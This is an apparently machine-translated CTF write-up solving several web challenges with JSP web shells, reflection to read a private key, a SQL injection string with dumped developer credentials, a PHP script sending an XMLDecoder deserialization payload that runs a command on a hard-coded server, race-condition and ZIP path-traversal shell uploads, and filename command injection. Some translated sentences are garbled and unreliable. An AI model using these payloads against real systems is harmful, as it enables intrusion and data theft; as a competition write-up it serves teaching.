When creating an order, you can intercept the form submission in Burp and change the orderName field to anything.jsp, and in the order field enter the text of any jsp-shell.
After loading, open the shell (link "You can check your order here") and download the tomcat'ov directory of webapps, in it we find jsp files and compiled classes, decompiling one of them using the jad utility (WEB-INF / classes / ZN_Chocolate / CRYPTO /SecretGrandParentForBigBossesNeeds.class) see the key we need: private String TrueSecretChocolateKey () {return "ZNV: iMp0518UrU_53cR3T_k3y_50d11dcb46506e93917f82c0e828b1a9"; }
Input
Site with file upload functionality.
Jsp-shell in XML format, bypassing white-list. After that all participants were given the source code.
Task again could be solved in a "cheating" way, by reading the source code.
Output
Open the classes in JD-GUI: screenshot .
We can see the code of the JSP checker, which parses page imports. There're a lot of ways to check this flag, but not the flag. Initially the flag of SecretGrandParentForBigBossesNeeds.class:
public class SecretGrandParentForBigBossesNeeds { private String TrueSecretChocolateKey() { return "ZNV:3X@mPl3_k3y_a0a81ab87f74d307b8e51fd85048e714"; }
You can see your reflection. If we are trying to import SecretGrandParentForBigBossesNeeds, we’ll fail, let's try to import Secret.
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% Secret s = new Secret(); out.println(s.TrueSecretChocolateKey()); %>
Hm, error 500 ... we can read that "method TrueSecretChocolateKey of SadBigBoss is not visible".
Aha! After fixing the source code. But anyway, method is not visible, it's private. Let's use reflection to make it accessible:
<%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% SadBigBoss s = new SadBigBoss(); Method method = s.getClass().getDeclaredMethod("TrueSecretChocolateKey"); method.setAccessible(true); out.println(method.invoke(s)); %>
That's it flag is on the page =)
1. Found admin.jsp, search.jsp, index.jsp, admin_login.jsp, adminochka.jsp, adminochka.jsp.bak
2. I screwed up the test / test (apparently someone added)
3. Injection
potato 'AND' 1 \ '' = 1 union select 1, (select user ()), 3 - '=' 1%
host: zn-java
version: 5.5.46-0ubuntu0.14.04.2
user: webappuser @ localhost
wepapp.developers --------------------------------------- | id | username | password | --------------------------------------- | 0 | developer_Vasia | fpBA7BPlS8wJ | | 1 | developer_Jorik | 5FftW6Aua2ef | --------------------------------------- wepapp.goods ------------------------- | id | name | price | ------------------------- | 0 | potato | 40 | | 1 | apple | 100 | | 2 | carrot | 25 | | 3 | tomato | 120 | | 4 | pear | 70 | | 5 | tomato | 110 | | 12 | pear | 80 | | 13 | cucumber | 80 | ------------------------- wepapp.users ---------------------------- | id | username | password | ----------------------------
...
4. Compiled the client and recorded its traffic.
5. RCE through xml deserialization (solve.php)
solve.phpHidden text
<?php $x =<<<HTML <?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_05" class="java.beans.XMLDecoder"> <object id="_response" class="java.lang.String"> <string>Mode 1 to get a value</string> </object> <object id="runtime" class="java.lang.Runtime" method="getRuntime"> <void id="process" method="exec"> <string>cat webapps/flag.txt</string> </void> </object> <object idref="process"> <void id="inputStream" method="getInputStream"/> </object> <object id="inputStreamReader" class="java.io.InputStreamReader"> <object idref="inputStream"/> </object> <object id="bufferedReader" class="java.io.BufferedReader"> <object idref="inputStreamReader"/> </object> <object idref="bufferedReader"> <void id="line1" method="readLine"/> </object> <object idref="bufferedReader"> <void id="line2" method="readLine"/> </object> <string id="response"> <object idref="line1"/> <object idref="line2"/> </string> <object class="org.restlet.Response" method="getCurrent"> <void method ="setEntity"> <object idref = "response"/> <object class = "org.restlet.data.MediaType" field="TEXT_HTML"></object> </void> </object> </java> HTML; do { $socket = fsockopen("107.170.122.167", 80); } while (!$socket); $packet = "POST /ZN_HQ/API/prods HTTP/1.0\r\n"; $packet.= "Content-Type: application/x-java-serialized-object+xml\r\n"; $packet.= "Host: 107.170.122.167\n"; $packet.= "Connection: Close\r\n"; $packet.= "Content-Length: ".strlen($x)."\r\n"; $packet.= "Authorization: Basic ZGV2ZWxvcGVyX1Zhc2lhOmZwQkE3QlBsUzh3Sg==\r\n"; $packet.= "\r\n"; $packet.= $x; fwrite($socket, $packet); while(!@feof($socket)) echo fread($socket, 4096); fclose($socket); ?>
Input
Site (0x3d.ru) with OAuth (vk.com) functionality.
During recon one can find content.0x3d.ru and dev.0x3d.ru (127.0.0.1) subdomains.
Output
There were a lot of unintended bugs, including XSS, SQL injection, RCE, etc ...
1. Authentication bypass (unintended)
If you’re logging in to your private tab. You are currently logged in as a privileged user, which can upload files.
2. Authentication bypass
If you’re logging on to the web page, you’ve got to know how to download it: </ b> (<img src = ...): the first triggers logout CSRF (like / logout), the second is you auth token link. He will be able to follow your profile. Now you can login as a privileged user.
3. Race condition (unintended)
Privileged user can upload avatar. "* .php" is disallowed, but ".jpg.php" is ok =) Where's the shell? Hm, avatars are uploaded to content.0x3d.ru/avatars, but they are converted into $ hash.jpg. The file is first uploaded and converted afterwards.
Take BurpSuite, launch 100 threads (GET / avatars/beched.jpg.php, Host: content.0x3d.ru) and upload beched.jpg.php. Wow, 200! Shit, plain-text ... They disabled PHP in this dir, but anyway, this is a dangerous bug.
4. SQL injection (unintended)
It was a multi-INSERT and guessing fields. There was no link for the auth bypass. I found a working copy of the task on that server =)
5. Code execution (unintended)
So, we've got an author's testing server. Let's log in and check SQL injection there. Wow, there's file_priv = Y! Read the source code, read configs, no flag = (
But there's something else in ZIP upload functionality:
elseif(preg_match('/[.](ZIP)|(zip)|(RAR)|(rar)$/',$_FILES['fupload']['name'])) { $avatar = 'avatars/net-avatara.jpg'; $filename = $_FILES['fupload']['name']; $source = $_FILES['fupload']['tmp_name']; $target = $path_to_90_directory . $filename; move_uploaded_file($source, $target);// $path_to_90_directory $command = 'python /var/www/0x3d.ru/zn1/avatars/unzip.py /var/www/0x3d.ru/zn1/avatars/'.$filename; $temp = exec($command, $output); }
So, we can execute code in the filename. But no flag on this test server%)
6. Code execution
Now let's do what they want. Let's upload the shell into the docroot of content.0x3d.ru. We'll do it with github.com/ptoomey3/evilarc
Create a ZIP file with path traversal, Now we've got PHP shell on content.0x3d.ru
7. open_basedir bypass (unintended)
Command line functions are disabled, we can browse any directory with DirectoryIterator: ahack.ru/releases/glob_wrapper_open_basedir_exploit.php.txt
Btw, putenv () and mail () are not disabled
8. Flag
Remember dev.0x3d.ru? Let's try it from the web shell:
readfile ('http://dev.0x3d.ru');
$: nmap -p 5060 -T4 -A -v bank.defcon.su ..... PORT STATE SERVICE VERSION 5060/tcp open sip-proxy Asterisk PBX 11.17.1 |_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE .......
Source: https://habr.com/ru/post/271431/
All Articles